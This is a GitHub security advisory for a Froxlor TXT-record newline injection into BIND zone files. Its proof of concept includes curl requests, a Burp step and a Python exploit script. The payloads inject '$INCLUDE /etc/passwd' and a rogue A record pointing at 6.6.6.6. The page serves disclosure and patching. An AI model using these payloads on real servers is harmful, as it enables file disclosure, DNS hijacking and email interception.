GHSA-37M5-M4Q3-FC6X

Vulnerability from github – Published: 2026-06-03 21:02 – Updated: 2026-06-03 21:02
VLAI
Summary
Froxlor: BIND Zone File Injection via TXT Record Content
Details

Summary

The DomainZones.add API endpoint does not sanitize newline characters in TXT record content. An authenticated customer with DNS editing enabled can inject newlines into TXT record values, which break out of the record line in the generated BIND zone file. This enables injection of arbitrary BIND directives ($INCLUDE, $GENERATE) and arbitrary DNS records (A, MX, CNAME) into the zone file written to disk by the DNS rebuild cron.

This is an incomplete fix for CVE-2026-30932 (GHSA-x6w6-2xwp-3jh6), which patched the same newline injection for LOC, RP, SSHFP, and TLSA record types but did not patch TXT records.

Affected Code

lib/Froxlor/Api/Commands/DomainZones.php, lines 306-308:

} elseif ($type == 'TXT' && !empty($content)) {
    // check that TXT content is enclosed in " "
    $content = Dns::encloseTXTContent($content);
}

Dns::encloseTXTContent() (lib/Froxlor/Dns/Dns.php:571-592) only adds or removes surrounding quote characters. It does not strip newlines, carriage returns, or any BIND zone metacharacters.

Line 148 of DomainZones.php still contains:

// TODO regex validate content for invalid characters

The content flows to the zone file via DnsEntry::__toString() (lib/Froxlor/Dns/DnsEntry.php:83), which concatenates $this->content directly into the zone line followed by PHP_EOL. Embedded newlines in the content produce additional lines in the zone file output.

Comparison with CVE-2026-30932 fix

The v2.3.5 fix for CVE-2026-30932 added validation functions for these types:

Type Validation Added Still Vulnerable?
LOC Validate::validateDnsLoc() (strict regex) No
RP Validate::validateDnsRp() (domain validation) No
SSHFP Validate::validateDnsSshfp() (3-part split) No
TLSA Validate::validateDnsTlsa() (4-part split) No
TXT Dns::encloseTXTContent() (quotes only) Yes

PoC

Environment

  • Froxlor 2.3.5, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)
  • DNS enabled (system.bind_enable=1, system.dnsenabled=1)
  • Customer with dnsenabled=1, domain with isbinddomain=1
  • Customer has an API key (or uses the web UI DNS editor with Burp)

Reproduction via API

# Inject $INCLUDE directive to read /etc/passwd
curl -s -u "API_KEY:API_SECRET" \
  -H 'Content-Type: application/json' \
  -d '{
    "command": "DomainZones.add",
    "params": {
      "domainname": "testdomain.lab",
      "type": "TXT",
      "record": "@",
      "content": "v=spf1 +all\"\n$INCLUDE /etc/passwd",
      "ttl": 18000
    }
  }' \
  https://panel.example.com/api.php

Reproduction via Web UI (Burp)

  1. Log in as a customer with DNS editing enabled
  2. Navigate to Resources > Domains > (domain) > DNS Editor
  3. Add a new record: Type = TXT, Record = @, Content = any
  4. Intercept the POST request in Burp Suite
  5. Change the dns_content parameter to: v=spf1 +all"%0a$INCLUDE /etc/passwd (%0a is URL-encoded newline)
  6. Forward the request

Result

The API returns the generated zone content. The TXT record line is split at the newline, and $INCLUDE /etc/passwd appears on its own line as a BIND directive:

$TTL 604800
$ORIGIN testdomain.lab.
@   604800  IN  SOA  froxlor.lab admin.froxlor.lab. 2026041004 ...
@   18000   IN  TXT  "v=spf1 +all"
$INCLUDE /etc/passwd"
@   604800  IN  A    100.95.188.127
*   604800  IN  A    100.95.188.127

When the DNS rebuild cron runs, BIND processes the $INCLUDE directive and attempts to read /etc/passwd.

Variant: Arbitrary DNS record injection

The same technique injects arbitrary A/MX/CNAME records:

curl -s -u "API_KEY:API_SECRET" \
  -H 'Content-Type: application/json' \
  -d '{
    "command": "DomainZones.add",
    "params": {
      "domainname": "testdomain.lab",
      "type": "TXT",
      "record": "_spf",
      "content": "v=spf1 +all\"\nevil\t18000\tIN\tA\t6.6.6.6",
      "ttl": 18000
    }
  }' \
  https://panel.example.com/api.php

Result:

_spf   18000  IN  TXT  "v=spf1 +all"
evil   18000  IN  A    6.6.6.6

evil.testdomain.lab now resolves to attacker IP 6.6.6.6.

Automated PoC Script

#!/usr/bin/env python3
"""Froxlor <= 2.3.5 TXT Zone Injection — Incomplete CVE-2026-30932 Fix"""
import json, sys, requests, urllib3
urllib3.disable_warnings()

def api(target, key, secret, cmd, params=None):
    return requests.post(f"{target.rstrip('/')}/api.php",
        auth=(key, secret), json={"command": cmd, "params": params or {}},
        verify=False).json()

target, key, secret, domain = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]

# Inject $INCLUDE
r = api(target, key, secret, "DomainZones.add", {
    "domainname": domain, "type": "TXT", "record": "@",
    "content": 'v=spf1 +all"\n$INCLUDE /etc/passwd', "ttl": 18000})

for line in r.get("data", []):
    tag = "   <-- INJECTED" if "$INCLUDE" in str(line) else ""
    if line: print(f"  {line}{tag}")

print("\nCONFIRMED" if any("$INCLUDE" in str(l) for l in r.get("data",[])) else "FAILED")

Usage: python3 poc.py https://panel.example.com API_KEY API_SECRET domain.tld

Impact

  1. Information Disclosure: $INCLUDE directs BIND to read arbitrary world-readable files on the server. The included content is parsed as zone data and can be retrieved by the customer via DomainZones.listing or DNS queries to records created from parsed file lines.

  2. DNS Record Injection: Newline breakout allows injection of A, MX, CNAME, and other records into the zone file. A customer can point subdomains to attacker-controlled IPs, intercept email via MX injection, or perform subdomain takeover via CNAME injection.

  3. DNS Service Disruption: Malformed zone content causes BIND to reject the zone, creating a DNS outage for the affected domain. $GENERATE directives can create massive record sets for amplification.

Suggested Fix

Strip newlines and BIND metacharacters from TXT content. Minimal fix:

// lib/Froxlor/Api/Commands/DomainZones.php, around line 306
} elseif ($type == 'TXT' && !empty($content)) {
    // Strip characters that can break zone file format
    $content = str_replace(["\n", "\r", "\t"], '', $content);
    $content = Dns::encloseTXTContent($content);
}

A more comprehensive fix would add a validation function (similar to validateDnsLoc, validateDnsSshfp, etc.) that rejects any content containing zone metacharacters ($, newlines), and remove the TODO at line 148.

Severity
7.6 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.3.6"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "froxlor/froxlor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41234"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-03T21:02:12Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `DomainZones.add` API endpoint does not sanitize newline characters in TXT record content. An authenticated customer with DNS editing enabled can inject newlines into TXT record values, which break out of the record line in the generated BIND zone file. This enables injection of arbitrary BIND directives (`$INCLUDE`, `$GENERATE`) and arbitrary DNS records (A, MX, CNAME) into the zone file written to disk by the DNS rebuild cron.\n\nThis is an incomplete fix for CVE-2026-30932 (GHSA-x6w6-2xwp-3jh6), which patched the same newline injection for LOC, RP, SSHFP, and TLSA record types but did not patch TXT records.\n\n## Affected Code\n\n`lib/Froxlor/Api/Commands/DomainZones.php`, lines 306-308:\n\n```php\n} elseif ($type == \u0027TXT\u0027 \u0026\u0026 !empty($content)) {\n    // check that TXT content is enclosed in \" \"\n    $content = Dns::encloseTXTContent($content);\n}\n```\n\n`Dns::encloseTXTContent()` (`lib/Froxlor/Dns/Dns.php:571-592`) only adds or removes surrounding quote characters. It does not strip newlines, carriage returns, or any BIND zone metacharacters.\n\nLine 148 of `DomainZones.php` still contains:\n```php\n// TODO regex validate content for invalid characters\n```\n\nThe content flows to the zone file via `DnsEntry::__toString()` (`lib/Froxlor/Dns/DnsEntry.php:83`), which concatenates `$this-\u003econtent` directly into the zone line followed by `PHP_EOL`. Embedded newlines in the content produce additional lines in the zone file output.\n\n### Comparison with CVE-2026-30932 fix\n\nThe v2.3.5 fix for CVE-2026-30932 added validation functions for these types:\n\n| Type | Validation Added | Still Vulnerable? |\n|------|-----------------|-------------------|\n| LOC | `Validate::validateDnsLoc()` (strict regex) | No |\n| RP | `Validate::validateDnsRp()` (domain validation) | No |\n| SSHFP | `Validate::validateDnsSshfp()` (3-part split) | No |\n| TLSA | `Validate::validateDnsTlsa()` (4-part split) | No |\n| **TXT** | **`Dns::encloseTXTContent()` (quotes only)** | **Yes** |\n\n## PoC\n\n### Environment\n\n- Froxlor 2.3.5, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)\n- DNS enabled (`system.bind_enable=1`, `system.dnsenabled=1`)\n- Customer with `dnsenabled=1`, domain with `isbinddomain=1`\n- Customer has an API key (or uses the web UI DNS editor with Burp)\n\n### Reproduction via API\n\n```bash\n# Inject $INCLUDE directive to read /etc/passwd\ncurl -s -u \"API_KEY:API_SECRET\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\n    \"command\": \"DomainZones.add\",\n    \"params\": {\n      \"domainname\": \"testdomain.lab\",\n      \"type\": \"TXT\",\n      \"record\": \"@\",\n      \"content\": \"v=spf1 +all\\\"\\n$INCLUDE /etc/passwd\",\n      \"ttl\": 18000\n    }\n  }\u0027 \\\n  https://panel.example.com/api.php\n```\n\n### Reproduction via Web UI (Burp)\n\n1. Log in as a customer with DNS editing enabled\n2. Navigate to Resources \u003e Domains \u003e (domain) \u003e DNS Editor\n3. Add a new record: Type = TXT, Record = @, Content = any\n4. Intercept the POST request in Burp Suite\n5. Change the `dns_content` parameter to: `v=spf1 +all\"%0a$INCLUDE /etc/passwd`\n   (`%0a` is URL-encoded newline)\n6. Forward the request\n\n### Result\n\nThe API returns the generated zone content. The TXT record line is split at the newline, and `$INCLUDE /etc/passwd` appears on its own line as a BIND directive:\n\n```\n$TTL 604800\n$ORIGIN testdomain.lab.\n@   604800  IN  SOA  froxlor.lab admin.froxlor.lab. 2026041004 ...\n@   18000   IN  TXT  \"v=spf1 +all\"\n$INCLUDE /etc/passwd\"\n@   604800  IN  A    100.95.188.127\n*   604800  IN  A    100.95.188.127\n```\n\nWhen the DNS rebuild cron runs, BIND processes the `$INCLUDE` directive and attempts to read `/etc/passwd`.\n\n### Variant: Arbitrary DNS record injection\n\nThe same technique injects arbitrary A/MX/CNAME records:\n\n```bash\ncurl -s -u \"API_KEY:API_SECRET\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\n    \"command\": \"DomainZones.add\",\n    \"params\": {\n      \"domainname\": \"testdomain.lab\",\n      \"type\": \"TXT\",\n      \"record\": \"_spf\",\n      \"content\": \"v=spf1 +all\\\"\\nevil\\t18000\\tIN\\tA\\t6.6.6.6\",\n      \"ttl\": 18000\n    }\n  }\u0027 \\\n  https://panel.example.com/api.php\n```\n\nResult:\n\n```\n_spf   18000  IN  TXT  \"v=spf1 +all\"\nevil   18000  IN  A    6.6.6.6\n```\n\n`evil.testdomain.lab` now resolves to attacker IP `6.6.6.6`.\n\n### Automated PoC Script\n\n```python\n#!/usr/bin/env python3\n\"\"\"Froxlor \u003c= 2.3.5 TXT Zone Injection \u2014 Incomplete CVE-2026-30932 Fix\"\"\"\nimport json, sys, requests, urllib3\nurllib3.disable_warnings()\n\ndef api(target, key, secret, cmd, params=None):\n    return requests.post(f\"{target.rstrip(\u0027/\u0027)}/api.php\",\n        auth=(key, secret), json={\"command\": cmd, \"params\": params or {}},\n        verify=False).json()\n\ntarget, key, secret, domain = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]\n\n# Inject $INCLUDE\nr = api(target, key, secret, \"DomainZones.add\", {\n    \"domainname\": domain, \"type\": \"TXT\", \"record\": \"@\",\n    \"content\": \u0027v=spf1 +all\"\\n$INCLUDE /etc/passwd\u0027, \"ttl\": 18000})\n\nfor line in r.get(\"data\", []):\n    tag = \"   \u003c-- INJECTED\" if \"$INCLUDE\" in str(line) else \"\"\n    if line: print(f\"  {line}{tag}\")\n\nprint(\"\\nCONFIRMED\" if any(\"$INCLUDE\" in str(l) for l in r.get(\"data\",[])) else \"FAILED\")\n```\n\nUsage: `python3 poc.py https://panel.example.com API_KEY API_SECRET domain.tld`\n\n## Impact\n\n1. **Information Disclosure**: `$INCLUDE` directs BIND to read arbitrary world-readable files on the server. The included content is parsed as zone data and can be retrieved by the customer via `DomainZones.listing` or DNS queries to records created from parsed file lines.\n\n2. **DNS Record Injection**: Newline breakout allows injection of A, MX, CNAME, and other records into the zone file. A customer can point subdomains to attacker-controlled IPs, intercept email via MX injection, or perform subdomain takeover via CNAME injection.\n\n3. **DNS Service Disruption**: Malformed zone content causes BIND to reject the zone, creating a DNS outage for the affected domain. `$GENERATE` directives can create massive record sets for amplification.\n\n## Suggested Fix\n\nStrip newlines and BIND metacharacters from TXT content. Minimal fix:\n\n```php\n// lib/Froxlor/Api/Commands/DomainZones.php, around line 306\n} elseif ($type == \u0027TXT\u0027 \u0026\u0026 !empty($content)) {\n    // Strip characters that can break zone file format\n    $content = str_replace([\"\\n\", \"\\r\", \"\\t\"], \u0027\u0027, $content);\n    $content = Dns::encloseTXTContent($content);\n}\n```\n\nA more comprehensive fix would add a validation function (similar to `validateDnsLoc`, `validateDnsSshfp`, etc.) that rejects any content containing zone metacharacters (`$`, newlines), and remove the TODO at line 148.",
  "id": "GHSA-37m5-m4q3-fc6x",
  "modified": "2026-06-03T21:02:12Z",
  "published": "2026-06-03T21:02:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/froxlor/froxlor/security/advisories/GHSA-37m5-m4q3-fc6x"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-x6w6-2xwp-3jh6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/froxlor/froxlor"
    },
    {
      "type": "WEB",
      "url": "https://github.com/froxlor/froxlor/releases/tag/2.3.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Froxlor: BIND Zone File Injection via TXT Record Content"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.